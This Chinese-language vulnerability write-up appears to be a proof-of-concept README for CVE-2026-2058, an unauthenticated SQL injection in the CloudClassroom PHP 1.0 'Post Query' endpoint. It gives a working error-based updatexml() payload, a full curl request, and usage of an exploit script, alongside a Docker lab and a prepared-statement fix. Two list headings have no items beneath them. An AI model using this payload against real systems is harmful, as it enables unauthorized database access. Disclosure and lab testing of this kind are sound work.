| 字段 | 值 |
|---|
| CVE | CVE-2026-2058 |
| 漏洞类型 | SQL 注入 |
| CWE | CWE-89 |
| 受影响软件 | CloudClassroom PHP 项目 |
| 受影响版本 | 1.0 |
| 组件 | Post Query 功能 |
| 攻击向量 | 远程 |
| 是否需要认证 | 否 |
| 影响 | 数据库泄露 |
| 严重程度 | 高 |
| 攻击模式参考 | CAPEC-66 |
POST /postquerypublic
squeryx
后端代码直接将用户输入拼接进 SQL 查询,而没有进行适当的清理或使用参数化查询。
易受攻击的代码示例:
$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";
由于 $tempsquery 来源于用户输入,攻击者可以注入任意 SQL。
出于测试和研究目的,提供了一个易受攻击的 Docker 环境。
docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0
该漏洞可通过利用 MySQL updatexml() 函数的基于报错的 SQL 注入技术来触发。
示例载荷:
a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1
示例 curl 请求:
curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"
预期响应:
XPATH syntax error: '~cc_db~'
本仓库包含一个 bash 漏洞利用脚本,可自动:
chmod +x cloudclassroom_sqli_exploit.sh
./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic
示例:
./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic
攻击者可以:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L⚠️ 注意:由于影响评估不同,NVD 的 CVSS 评分与 CNA (VulDB) 的评分存在差异。
漏洞利用预测评分系统 (EPSS) 用于估算漏洞在现实环境中被利用的概率。
| CVE | EPSS 概率 | 百分位 | 日期 |
|---|---|---|---|
| CVE-2026-2058 | 0.00028 | 7.62 % | 2026-03-01 |
来源:FIRST EPSS 数据集
开发人员应:
安全实现示例:
$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();


此漏洞利用程序仅供教育和研究目的使用。
作者对因使用此代码而造成的滥用或损害概不负责。
bl4dsc4n
安全研究员